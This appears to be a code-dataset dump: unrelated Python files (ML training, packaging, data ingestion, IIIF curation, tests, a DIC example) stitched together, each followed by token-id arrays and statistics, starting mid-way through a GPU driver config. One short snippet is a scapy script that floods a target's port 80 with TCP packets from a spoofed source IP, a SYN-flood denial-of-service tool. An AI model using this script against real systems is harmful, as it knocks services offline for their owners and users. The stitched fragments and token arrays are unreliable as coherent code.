'GL_NV_parameter_buffer_object GL_NV_parameter_buffer_object2' ' GL_NV_path_rendering GL_NV_pixel_data_range ' 'GL_NV_point_sprite GL_NV_primitive_restart ' 'GL_NV_register_combiners GL_NV_register_combiners2 ' 'GL_NV_shader_atomic_counters GL_NV_shader_atomic_float ' 'GL_NV_shader_buffer_load GL_NV_shader_storage_buffer_object ' 'GL_ARB_sparse_texture GL_NV_texgen_reflection ' 'GL_NV_texture_barrier GL_NV_texture_compression_vtc ' 'GL_NV_texture_env_combine4 GL_NV_texture_expand_normal ' 'GL_NV_texture_multisample GL_NV_texture_rectangle ' 'GL_NV_texture_shader GL_NV_texture_shader2 ' 'GL_NV_texture_shader3 GL_NV_transform_feedback ' 'GL_NV_transform_feedback2 GL_NV_vdpau_interop ' 'GL_NV_vertex_array_range GL_NV_vertex_array_range2 ' 'GL_NV_vertex_attrib_integer_64bit ' 'GL_NV_vertex_buffer_unified_memory GL_NV_vertex_program ' 'GL_NV_vertex_program1_1 GL_NV_vertex_program2 ' 'GL_NV_vertex_program2_option GL_NV_vertex_program3 ' 'GL_NVX_conditional_render GL_NVX_gpu_memory_info ' 'GL_SGIS_generate_mipmap GL_SGIS_texture_lod ' 'GL_SGIX_depth_texture GL_SGIX_shadow GL_SUN_slice_accum ' }, 'devices': [ { 'device_string': '', 'vendor_id': 4318.0, 'device_id': 3576.0, 'vendor_string': '' }], 'driver_bug_workarounds': ['clear_uniforms_before_first_program_use', 'disable_gl_path_rendering', 'init_gl_position_in_vertex_shader', 'init_vertex_attributes', 'remove_pow_with_constant_exponent', 'scalarize_vec_and_mat_constructor_args', 'use_current_program_after_successful_link', 'use_virtualized_gl_contexts'] }
[ 2, 15069, 1853, 383, 18255, 1505, 46665, 13, 1439, 2489, 10395, 13, 198, 2, 5765, 286, 428, 2723, 2438, 318, 21825, 416, 257, 347, 10305, 12, 7635, 5964, 326, 460, 307, 198, 2, 1043, 287, 262, 38559, 24290, 2393, 13, 198, 198, 2, ...
1.908676
7,238
#! /usr/bin/env python3 # vim: et:ts=4:sw=4:fenc=utf-8 from abc import ABC, abstractmethod from collections import defaultdict import re
[ 2, 0, 1220, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 43907, 25, 2123, 25, 912, 28, 19, 25, 2032, 28, 19, 25, 69, 12685, 28, 40477, 12, 23, 198, 198, 6738, 450, 66, 1330, 9738, 11, 12531, 24396, 198, 198, 6738, 17268, 1330,...
2.685185
54
import os from os import path import json import shutil import tensorflow as tf import numpy as np # Importa cosas de Keras API from tensorflow.keras.optimizers import Adam, RMSprop from tensorflow.keras.models import Sequential from tensorflow.keras.utils import plot_model # Importa callbacks del modelo from training_utils.callbacks import TrainingCheckPoints from tensorflow.keras.callbacks import CSVLogger, TensorBoard # Importa cosas para graficar el entrenameinto from training_utils.training_graphs import graph_confusion_matrix from training_utils.training_graphs import graph_model_metrics # Function that continues the training of a model # Args: # path_to_model: path were to find the model and setup # dataset: tuple of tensorflow dataset of (train, test) # Method that starts the model training # Args: # setup: Dictionary with the model setup # model: the keras.Model architecture to train # dataset: tuple of tensorflow dataset of (train, test) # Metodo, que entrena un modelo ya compilado, implementa callbacks de # tensorboard, log a un archivo CSV y creacion de checkpoints cuando ocurre # mejoras en el loss, tambien grafica y crea matriz de confusion # Args: # compiled_model: keras.Model ya compilado # dataset: tuple of tensorflow dataset of (train, test) # opt: keras.Optimizer used in training # epochs: The number of epochs to train # initial_epoch: Epoch to start training, 0 for normal training # continue_train: if the model is continuing training # classes: array of classes that the model predict
[ 11748, 28686, 198, 6738, 28686, 1330, 3108, 198, 11748, 33918, 198, 11748, 4423, 346, 198, 198, 11748, 11192, 273, 11125, 355, 48700, 198, 11748, 299, 32152, 355, 45941, 198, 198, 2, 17267, 64, 8615, 292, 390, 17337, 292, 7824, 198, 673...
3.342612
467
#!/usr/bin/env python """Setup script to make PUDL directly installable with pip.""" import os from pathlib import Path from setuptools import find_packages, setup install_requires = [ 'coloredlogs', 'datapackage>=1.9.0', 'dbfread', 'goodtables', 'matplotlib', 'networkx>=2.2', 'numpy', 'pandas>=0.24', 'pyarrow>=0.14.0', 'pyyaml', 'scikit-learn>=0.20', 'scipy', 'sqlalchemy>=1.3.0', 'tableschema', 'tableschema-sql>=1.1.0', 'timezonefinder', 'xlsxwriter', ] # We are installing the PUDL module to build the docs, but the C libraries # required to build snappy aren't available on RTD, so we need to exclude it # from the installed dependencies here, and mock it for import in docs/conf.py # using the autodoc_mock_imports parameter: if not os.getenv('READTHEDOCS'): install_requires.append('python-snappy') doc_requires = [ 'doc8', 'sphinx', 'sphinx_rtd_theme', ] test_requires = [ 'bandit', 'coverage', 'doc8', 'flake8', 'flake8-docstrings', 'flake8-builtins', 'pep8-naming', 'pre-commit', 'pydocstyle', 'pytest', 'pytest-cov', 'nbval', ] readme_path = Path(__file__).parent / "README.rst" long_description = readme_path.read_text() setup( name='catalystcoop.pudl', description='An open data processing pipeline for public US utility data.', long_description=long_description, long_description_content_type='text/x-rst', use_scm_version=True, author='Catalyst Cooperative', author_email='pudl@catalyst.coop', maintainer='Zane A. Selvans', maintainer_email='zane.selvans@catalyst.coop', url="https://catalyst.coop/pudl", project_urls={ "Source": "https://github.com/catalyst-cooperative/pudl", "Documentation": "https://catalystcoop-pudl.readthedocs.io", "Issue Tracker": "https://github.com/catalyst-cooperative/pudl/issues", }, license='MIT', keywords=[ 'electricity', 'energy', 'data', 'analysis', 'mcoe', 'climate change', 'finance', 'eia 923', 'eia 860', 'ferc', 'form 1', 'epa ampd', 'epa cems', 'coal', 'natural gas', ], python_requires='>=3.7, <3.8.0a0', setup_requires=['setuptools_scm'], install_requires=install_requires, extras_require={ "doc": doc_requires, "test": test_requires, }, classifiers=[ 'Development Status :: 3 - Alpha', 'Environment :: Console', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Natural Language :: English', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3.7', 'Topic :: Scientific/Engineering', ], packages=find_packages('src'), package_dir={'': 'src'}, # package_data is data that is deployed within the python package on the # user's system. setuptools will get whatever is listed in MANIFEST.in include_package_data=True, # This defines the interfaces to the command line scripts we're including: entry_points={ 'console_scripts': [ 'pudl_data = pudl.workspace.datastore_cli:main', 'pudl_setup = pudl.workspace.setup_cli:main', 'pudl_etl = pudl.cli:main', 'datapkg_to_sqlite = pudl.convert.datapkg_to_sqlite:main', 'ferc1_to_sqlite = pudl.convert.ferc1_to_sqlite:main', 'epacems_to_parquet = pudl.convert.epacems_to_parquet:main', ] }, )
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 37811, 40786, 4226, 284, 787, 350, 8322, 43, 3264, 2721, 540, 351, 7347, 526, 15931, 198, 198, 11748, 28686, 198, 6738, 3108, 8019, 1330, 10644, 198, 198, 6738, 900, 37623, 10141, 1330, ...
2.324201
1,533
from BTrees import OOBTree from datetime import datetime, date, timedelta from persistent import Persistent from .vulnerability import Vulnerability import fcntl import glob import gzip import json import logging import os import os.path as p import requests import transaction import ZODB import ZODB.FileStorage DEFAULT_MIRROR = 'https://nvd.nist.gov/feeds/json/cve/1.1/' DEFAULT_CACHE_DIR = '~/.cache/vulnix' _log = logging.getLogger(__name__)
[ 6738, 22205, 6037, 1330, 440, 9864, 27660, 198, 6738, 4818, 8079, 1330, 4818, 8079, 11, 3128, 11, 28805, 12514, 198, 6738, 16218, 1330, 9467, 7609, 198, 6738, 764, 85, 40920, 1330, 569, 40920, 198, 11748, 277, 66, 429, 75, 198, 11748, ...
2.993377
151
from scapy.all import * src = input("Source IP: ") target = input("Target IP: ") i=1 while True: for srcport in range(1, 65535): ip = IP(src=src, dst=target) tcp = TCP(sport=srcport, dport=80) pkt = ip / tcp send(pkt, inter= .0001) print("Packet Sent ", i) i=i+1
[ 6738, 629, 12826, 13, 439, 1330, 1635, 198, 198, 10677, 796, 5128, 7203, 7416, 6101, 25, 366, 8, 198, 16793, 796, 5128, 7203, 21745, 6101, 25, 366, 8, 198, 198, 72, 28, 16, 198, 4514, 6407, 25, 198, 220, 220, 220, 329, 12351, 634,...
2.025641
156
import hashlib import unittest from colicoords.cell import Cell, CellList from colicoords.preprocess import data_to_cells from test import testcase from test.test_functions import load_testdata if __name__ == '__main__': unittest.main()
[ 11748, 12234, 8019, 201, 198, 11748, 555, 715, 395, 201, 198, 6738, 951, 3713, 3669, 13, 3846, 1330, 12440, 11, 12440, 8053, 201, 198, 6738, 951, 3713, 3669, 13, 3866, 14681, 1330, 1366, 62, 1462, 62, 46342, 201, 198, 6738, 1332, 1330...
2.865169
89
# --------------------------------------------------------------------------- # # Importing section # --------------------------------------------------------------------------- # import os import sys import argparse import logging import json from classes.alerts import SlackClient from influxdb import InfluxDBClient from classes.data_manager import DataManager # --------------------------------------------------------------------------- # # Functions # -----------------------------------------------------------------------------# # --------------------------------------------------------------------------- # # Main # --------------------------------------------------------------------------- # if __name__ == "__main__": # --------------------------------------------------------------------------- # # Configuration file # --------------------------------------------------------------------------- # arg_parser = argparse.ArgumentParser() arg_parser.add_argument("-c", help="configuration file") arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)") args = arg_parser.parse_args() config_file = args.c if os.path.isfile(config_file) is False: print('\nATTENTION! Unable to open configuration file %s\n' % config_file) sys.exit(1) cfg = json.loads(open(args.c).read()) conns_cfg = json.loads(open(cfg['connectionsFile']).read()) cfg.update(conns_cfg) # --------------------------------------------------------------------------- # # Set logging object # --------------------------------------------------------------------------- # if not args.l: log_file = None else: log_file = args.l logger = logging.getLogger() logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO, filename=log_file) # --------------------------------------------------------------------------- # # Starting program # --------------------------------------------------------------------------- # logger.info("Starting program") # --------------------------------------------------------------------------- # # InfluxDB connection # --------------------------------------------------------------------------- # logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port'])) try: influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'], password=cfg['influxDB']['password'], username=cfg['influxDB']['user'], database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl']) except Exception as e: logger.error('EXCEPTION: %s' % str(e)) sys.exit(3) logger.info('Connection successful') dm = DataManager(influx_client, cfg, logger) # Download files from the FTP server if cfg['ftp']['enabled'] is True: logger.info('Download data from FTP server') dm.open_ftp_connection() dm.download_remote_files() # Insert data into InfluxDB if cfg['influxDB']['dataImporting'] is True: logger.info('Importing in InfluxDB of raw data related to files in %s' % cfg['ftp']['localFolders']['tmp']) dm.insert_data() # Delete files correctly handled on the FTP server and close the FTP connection if cfg['ftp']['enabled'] is True: if cfg['ftp']['deleteRemoteFile'] is True: logger.info('Delete handled files from FTP server') dm.delete_remote_files() dm.close_ftp_connection() # Slack alert if cfg['alerts']['slack']['enabled'] is True: slack_msg() logger.info("Ending program")
[ 2, 16529, 32284, 1303, 198, 2, 17267, 278, 2665, 198, 2, 16529, 32284, 1303, 198, 198, 11748, 28686, 198, 11748, 25064, 198, 11748, 1822, 29572, 198, 11748, 18931, 198, 11748, 33918, 198, 198, 6738, 6097, 13, 44598, 82, 1330, 36256, 117...
3.174236
1,211
#!/usr/bin/env python3 # -*- coding: utf-8 -*- __author__ = 'ipetrash' import re DEBUG = False lines = """ function II1I1_II takes real II1I1__I returns nothing local real II1I1_1I local real st=TimerGetElapsed(II1I___I) if st<=0 then set II1I___I=CreateTimer() call TimerStart(II1I___I,1000000,false,null) endif if(II1I1__I>0)then loop set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st exitwhen II1I1_1I<=0 if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then call TriggerSleepAction(0.1*II1I1_1I) else call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL) endif endloop endif endfunction """.strip().splitlines() stack = [] items = [] for line in lines: if line.startswith('globals'): stack.append('globals') elif line.startswith('endglobals'): stack.pop(-1) stack.append('endglobals') elif line.startswith('function'): stack.append('function') elif line.startswith('endfunction'): stack.pop(-1) stack.append('endfunction') elif line.startswith('loop'): stack.append('loop') elif line.startswith('endloop'): stack.pop(-1) stack.append('endloop') elif line.startswith('if'): stack.append('if') elif line.startswith('elseif'): stack.pop(-1) stack.append('elseif') elif line.startswith('else'): stack.pop(-1) stack.append('else') elif line.startswith('endif'): stack.pop(-1) stack.append('endif') else: stack.append(line[:8] + '...') indent = len(stack) - 1 line = merge_str_literal(line) items.append(' ' * indent + line) DEBUG and print(f'{indent}. {line!r}', stack) # Add empty line after endglobals and endfunction if line.startswith('endglobals') or line.startswith('endfunction'): items.append('') if stack[-1] not in ['globals', 'function', 'loop', 'if', 'elseif', 'else']: stack.pop(-1) new_text = '\n'.join(items).strip() print(new_text) """ function II1I1_II takes real II1I1__I returns nothing local real II1I1_1I local real st=TimerGetElapsed(II1I___I) if st<=0 then set II1I___I=CreateTimer() call TimerStart(II1I___I,1000000,false,null) endif if(II1I1__I>0)then loop set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st exitwhen II1I1_1I<=0 if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then call TriggerSleepAction(0.1*II1I1_1I) else call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL) endif endloop endif endfunction """
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 834, 9800, 834, 796, 705, 541, 21879, 1077, 6, 628, 198, 11748, 302, 628, 198, 30531, 796, 10352, 628, 198, ...
2.089457
1,252
from common.commons import * DATA_PATH = os.environ["DATA_PATH"]
[ 6738, 2219, 13, 9503, 684, 1330, 1635, 198, 26947, 62, 34219, 796, 28686, 13, 268, 2268, 14692, 26947, 62, 34219, 8973, 198 ]
2.954545
22
# -*- coding: utf-8 -*- import os import sys import tensorflow as tf import numpy as np import data_utils from translate import Transliteration from flask import Flask, request, jsonify transliteration = Transliteration() app = Flask(__name__) # Flask , . app.config['JSON_AS_ASCII'] = False # . if __name__ == "__main__": app.run(debug = True, host='0.0.0.0', port=80, use_reloader=False)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 28686, 198, 11748, 25064, 198, 11748, 11192, 273, 11125, 355, 48700, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 1366, 62, 26791, 198, 6738, 15772, 1330, 3602, ...
2.72
150
from django.apps import AppConfig
[ 6738, 42625, 14208, 13, 18211, 1330, 2034, 16934, 628 ]
3.888889
9
""" Interface to the env_build.xml file. This class inherits from EnvBase """ from CIME.XML.standard_module_setup import * from CIME.XML.env_base import EnvBase logger = logging.getLogger(__name__)
[ 37811, 198, 39317, 284, 262, 17365, 62, 11249, 13, 19875, 2393, 13, 220, 770, 1398, 10639, 896, 422, 2039, 85, 14881, 198, 37811, 198, 6738, 327, 12789, 13, 55, 5805, 13, 20307, 62, 21412, 62, 40406, 1330, 1635, 198, 198, 6738, 327, ...
2.871429
70
# -*- coding: utf-8 -*- {{{ # vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et: # # Copyright 2019, Battelle Memorial Institute. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # This material was prepared as an account of work sponsored by an agency of # the United States Government. Neither the United States Government nor the # United States Department of Energy, nor Battelle, nor any of their # employees, nor any jurisdiction or organization that has cooperated in the # development of these materials, makes any warranty, express or # implied, or assumes any legal liability or responsibility for the accuracy, # completeness, or usefulness or any information, apparatus, product, # software, or process disclosed, or represents that its use would not infringe # privately owned rights. Reference herein to any specific commercial product, # process, or service by trade name, trademark, manufacturer, or otherwise # does not necessarily constitute or imply its endorsement, recommendation, or # favoring by the United States Government or any agency thereof, or # Battelle Memorial Institute. The views and opinions of authors expressed # herein do not necessarily state or reflect those of the # United States Government or any agency thereof. # # PACIFIC NORTHWEST NATIONAL LABORATORY operated by # BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY # under Contract DE-AC05-76RL01830 # }}} import datetime import logging import os import sys import statistics from volttron.platform.vip.agent import Agent, RPC, Core from volttron.platform.agent import utils from volttron.platform.agent.utils import get_aware_utc_now utils.setup_logging() _log = logging.getLogger(__name__) __version__ = '1.0' def log_statistics(config_path, **kwargs): """Load the LogStatisticsAgent agent configuration and returns and instance of the agent created using that configuration. :param config_path: Path to a configuration file. :type config_path: str :returns: LogStatisticsAgent agent instance :rtype: LogStatisticsAgent agent """ config = utils.load_config(config_path) return LogStatisticsAgent(config, **kwargs) def main(argv=sys.argv): """Main method called by the platform.""" utils.vip_main(log_statistics, identity='platform.logstatisticsagent') if __name__ == '__main__': # Entry point for script try: sys.exit(main()) except KeyboardInterrupt: pass
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 22935, 90, 198, 2, 43907, 25, 900, 277, 12685, 28, 40477, 12, 23, 10117, 28, 29412, 1509, 28, 19, 40379, 28, 19, 39747, 28, 19, 2123, 25, 198, 2, 198, 2, 15069, 13130, ...
3.626387
811
from rest_framework.serializers import ModelSerializer from .models import Place, Status, OSType, Stock, ComputerStock
[ 6738, 1334, 62, 30604, 13, 46911, 11341, 1330, 9104, 32634, 7509, 198, 198, 6738, 764, 27530, 1330, 8474, 11, 12678, 11, 440, 2257, 2981, 11, 10500, 11, 13851, 26207, 628, 628, 628 ]
3.90625
32
# -*- coding: utf-8 -*- # # Copyright 2012-2015 Spotify AB # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from helpers import unittest, in_parse import luigi import luigi.interface import json import collections
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 198, 2, 15069, 2321, 12, 4626, 26778, 9564, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743,...
3.637755
196
# -*- coding: UTF-8 -*- import logging from typing import List from echoscope.config import config from echoscope.util import mysql_util, str_util, log_util from echoscope.model import ds_model, config_model from echoscope.source import source
[ 2, 532, 9, 12, 19617, 25, 41002, 12, 23, 532, 9, 12, 198, 198, 11748, 18931, 198, 6738, 19720, 1330, 7343, 198, 198, 6738, 304, 354, 40326, 13, 11250, 1330, 4566, 198, 6738, 304, 354, 40326, 13, 22602, 1330, 48761, 62, 22602, 11, ...
3.25
76
# last edited: 10/08/2017, 10:25 import os, sys, glob, subprocess from datetime import datetime from PyQt4 import QtGui, QtCore import math #from XChemUtils import mtztools import XChemDB import XChemRefine import XChemUtils import XChemLog import XChemToolTips import csv try: import gemmi import pandas except ImportError: pass #def get_names_of_current_clusters(xce_logfile,panddas_directory): # Logfile=XChemLog.updateLog(xce_logfile) # Logfile.insert('parsing {0!s}/cluster_analysis'.format(panddas_directory)) # os.chdir('{0!s}/cluster_analysis'.format(panddas_directory)) # cluster_dict={} # for out_dir in sorted(glob.glob('*')): # if os.path.isdir(out_dir): # cluster_dict[out_dir]=[] # found_first_pdb=False # for folder in glob.glob(os.path.join(out_dir,'pdbs','*')): # xtal=folder[folder.rfind('/')+1:] # if not found_first_pdb: # if os.path.isfile(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb') ): # cluster_dict[out_dir].append(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb')) # found_first_pdb=True # cluster_dict[out_dir].append(xtal) # return cluster_dict
[ 2, 938, 13012, 25, 838, 14, 2919, 14, 5539, 11, 838, 25, 1495, 198, 198, 11748, 28686, 11, 25064, 11, 15095, 11, 850, 14681, 198, 6738, 4818, 8079, 1330, 4818, 8079, 198, 6738, 9485, 48, 83, 19, 1330, 33734, 8205, 72, 11, 33734, 1...
2.102446
654
# -*- coding: utf-8 -*- """ Global app forms """ # Standard Library import re # Django Library from django import forms from django.contrib.auth.forms import UserChangeForm, UserCreationForm from django.utils.translation import ugettext_lazy as _ # Thirdparty Library from dal import autocomplete # Localfolder Library from ..models import PyCompany, PyCountry, PyUser from .partner import PartnerForm # ========================================================================== # # ========================================================================== #
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 37811, 198, 22289, 598, 5107, 198, 37811, 198, 2, 8997, 10074, 198, 11748, 302, 198, 198, 2, 37770, 10074, 198, 6738, 42625, 14208, 1330, 5107, 198, 6738, 42625, 14208, ...
4.237037
135
from unittest import mock import pytest from django.http import HttpRequest from rest_framework.response import Response from rest_framework.test import APIClient from drf_viewset_profiler.middleware import LineProfilerViewSetMiddleware
[ 6738, 555, 715, 395, 1330, 15290, 198, 198, 11748, 12972, 9288, 198, 6738, 42625, 14208, 13, 4023, 1330, 367, 29281, 18453, 198, 6738, 1334, 62, 30604, 13, 26209, 1330, 18261, 198, 6738, 1334, 62, 30604, 13, 9288, 1330, 3486, 2149, 75, ...
3.641791
67
# This allows for running the example when the repo has been cloned import sys from os.path import abspath sys.path.extend([abspath(".")]) # Example code follows import logging import numpy as np import matplotlib.pyplot as plt import muDIC.vlab as vlab import muDIC as dic """ This example case runs an experiment where a deformation gradient is used to deform a synthetically generated speckle, the speckle is then down sampled by a factor of four and sensor artifacts are included. The analysis is then performed and the resulting deformation gradient field is compared to the one used to deform the images """ # Set the amount of info printed to terminal during analysis logging.basicConfig(format='%(name)s:%(levelname)s:%(message)s', level=logging.INFO) show_results = False # Define the image you want to analyse n_imgs = 2 image_shape = (500, 500) downsample_factor = 4 super_image_shape = tuple(dim * downsample_factor for dim in image_shape) # Make a speckle image speckle_image = vlab.rosta_speckle(super_image_shape, dot_size=4, density=0.5, smoothness=2.0) # Make an image deformed F = np.array([[1.01,0],[0.01,1.0]]) image_deformer = vlab.imageDeformer_from_defGrad(F) # Make an image down-sampler including downscaling, fill-factor and sensor grid irregularities downsampler = vlab.Downsampler(image_shape=super_image_shape, factor=downsample_factor, fill=.95, pixel_offset_stddev=0.05) # Make a noise injector producing 2% gaussian additive noise noise_injector = vlab.noise_injector("gaussian", sigma=.02) # Make an synthetic image generation pipeline image_generator = vlab.SyntheticImageGenerator(speckle_image=speckle_image, image_deformer=image_deformer, downsampler=downsampler, noise_injector=noise_injector, n=n_imgs) # Put it into an image stack image_stack = dic.ImageStack(image_generator) # Now, make a mesh. Make sure to use enough elements mesher = dic.Mesher(deg_n=3, deg_e=3,type="spline") #mesh = mesher.mesh(image_stack) # Use this if you want to use a GUI mesh = mesher.mesh(image_stack,Xc1=50,Xc2=450,Yc1=50,Yc2=450,n_ely=8,n_elx=8, GUI=False) # Prepare the analysis input and initiate the analysis input = dic.DICInput(mesh, image_stack) input.tol = 1e-6 input.interpolation_order = 4 dic_job = dic.DICAnalysis(input) results = dic_job.run() # Calculate the fields for later use. Seed is used when spline elements are used and upscale is used for Q4. fields = dic.Fields(results, seed=101,upscale=10) # We will now compare the results from the analysis to the deformation gradient which the image was deformed by if show_results: plt.figure() plt.imshow(F[0,0] - fields.F()[0, 0,0, :, :, 1], cmap=plt.cm.magma) plt.xlabel("Element e-coordinate") plt.ylabel("Element n-coordinate") plt.colorbar() plt.title("Difference in deformation gradient component 0,0 within the element") fig1 = plt.figure() ax1 = fig1.add_subplot(111) #line1 = ax1.plot(res_field[:, 50], label="correct") line2 = ax1.plot(fields.F()[0, 0,0, :, 50, 1], label="DIC") ax1.set_xlabel("element e-coordinate") ax1.set_ylabel("Deformation gradient component 0,0 []") ax2 = fig1.add_subplot(111, sharex=ax1, frameon=False) line3 = ax2.plot(F[0,0] - fields.F()[0, 0,0, :, 50, 1], "r--", label="difference") ax2.yaxis.tick_right() ax2.yaxis.set_label_position("right") ax2.set_ylabel("Deviation []") plt.title("Deformation gradient component 0,0") fig1.legend() plt.show()
[ 2, 770, 3578, 329, 2491, 262, 1672, 618, 262, 29924, 468, 587, 537, 12004, 198, 11748, 25064, 198, 6738, 28686, 13, 6978, 1330, 2352, 6978, 198, 17597, 13, 6978, 13, 2302, 437, 26933, 397, 2777, 776, 7203, 19570, 12962, 198, 198, 2, ...
2.653473
1,339
mongo = { "user": "", "passwd": "", "db": "ghtorrent" } perspective_api_key = ""
[ 76, 25162, 796, 1391, 366, 7220, 1298, 366, 1600, 366, 6603, 16993, 1298, 366, 1600, 366, 9945, 1298, 366, 456, 13165, 1156, 1, 1782, 198, 19276, 806, 425, 62, 15042, 62, 2539, 796, 13538, 198 ]
2.314286
35
from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory from tests.unit.dataactvalidator.utils import number_of_errors, query_columns _FILE = 'fabs38_detached_award_financial_assistance_2' def test_success(database): """ AwardingOfficeCode must be six characters long. """ det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAA') det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='111111') det_award_3 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAA111') det_award_4 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='') det_award_5 = DetachedAwardFinancialAssistanceFactory(awarding_office_code=None) errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5]) assert errors == 0 def test_failure(database): """ AwardingOfficeCode must be six characters long. """ det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAA1') det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAAA') errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2]) assert errors == 2
[ 6738, 5254, 13, 20850, 13, 7890, 529, 7295, 13, 22584, 1749, 13, 301, 3039, 1330, 4614, 2317, 32, 904, 43621, 8021, 9311, 22810, 198, 6738, 5254, 13, 20850, 13, 7890, 529, 12102, 1352, 13, 26791, 1330, 1271, 62, 1659, 62, 48277, 11, ...
2.951276
431
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Tue Aug 31 22:48:21 2021 @author: apple """ import numpy as np import pandas as pd from HRP import seriation import fastcluster from scipy.cluster.hierarchy import fcluster from gap_statistic import OptimalK from backtest import df_to_matrix #HERC #Dataframe of returns
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 37811, 198, 41972, 319, 30030, 2447, 3261, 2534, 25, 2780, 25, 2481, 33448, 198, 198, 31, 9800, 25, 17180, 198, 3...
2.674419
129
import urllib.request from bs4 import BeautifulSoup import csv import requests import os import json import time import glob files = glob.glob("/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json") for i in range(len(files)): file = files[i] file_id = file.split("/")[-1].replace(".json", "") opath = "/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/curation/"+file_id+".json" if not os.path.exists(opath): fw = open(opath, 'w') curation_data = {} curation_uri = "curation:"+file_id+".json" with open(file) as f: try: df = json.load(f) except: continue anno_count = 1 if "sequences" in df: print(file) members = [] canvases = df["sequences"][0]["canvases"] for j in range(len(canvases)): canvas = canvases[j] if "otherContent" in canvas: id = canvas["otherContent"][0]["@id"] headers = {"content-type": "application/json"} # time.sleep(0.5) r = requests.get(id, headers=headers) data = r.json() print(id) resources = data["resources"] for resource in resources: member_id = resource["on"] res = resource["resource"] chars = res["chars"] member = { "@id": member_id, "@type": "sc:Canvas", "label": "[Annotation " + str(anno_count) + "]", "description": chars, "metadata": [ { "label": res["@type"], "value": chars } ] } anno_count += 1 members.append(member) if len(members) > 0: label = "" if "label" in df: label = df["label"] curation_data = { "@context": [ "http://iiif.io/api/presentation/2/context.json", "http://codh.rois.ac.jp/iiif/curation/1/context.json" ], "@type": "cr:Curation", "@id": curation_uri, "label": "Automatic curation by IIIF Converter", "selections": [ { "@id": curation_uri + "/range1", "@type": "sc:Range", "label": "Automatic curation by IIIF Converter", "members": members, "within": { "@id": df["@id"], "@type": "sc:Manifest", "label": label } } ] } json.dump(curation_data, fw, ensure_ascii=False, indent=4, sort_keys=True, separators=(',', ': '))
[ 11748, 2956, 297, 571, 13, 25927, 198, 6738, 275, 82, 19, 1330, 23762, 50, 10486, 198, 11748, 269, 21370, 198, 11748, 7007, 198, 11748, 28686, 198, 11748, 33918, 198, 11748, 640, 198, 11748, 15095, 198, 198, 16624, 796, 15095, 13, 4743,...
1.529832
2,380
from lib import get_itineraries import data if __name__ == '__main__': for itinerary in get_itineraries(data.sicily): print("#" * 24) print(itinerary) print("")
[ 6738, 9195, 1330, 651, 62, 270, 7274, 3166, 198, 11748, 1366, 198, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 329, 45142, 560, 287, 651, 62, 270, 7274, 3166, 7, 7890, 13, 21383, 813, 2599, 198...
2.289157
83
import numpy as np from sawyer.mujoco.tasks.base import ComposableTask
[ 11748, 299, 32152, 355, 45941, 198, 198, 6738, 2497, 9860, 13, 76, 23577, 25634, 13, 83, 6791, 13, 8692, 1330, 29936, 540, 25714, 628, 628, 628 ]
2.961538
26
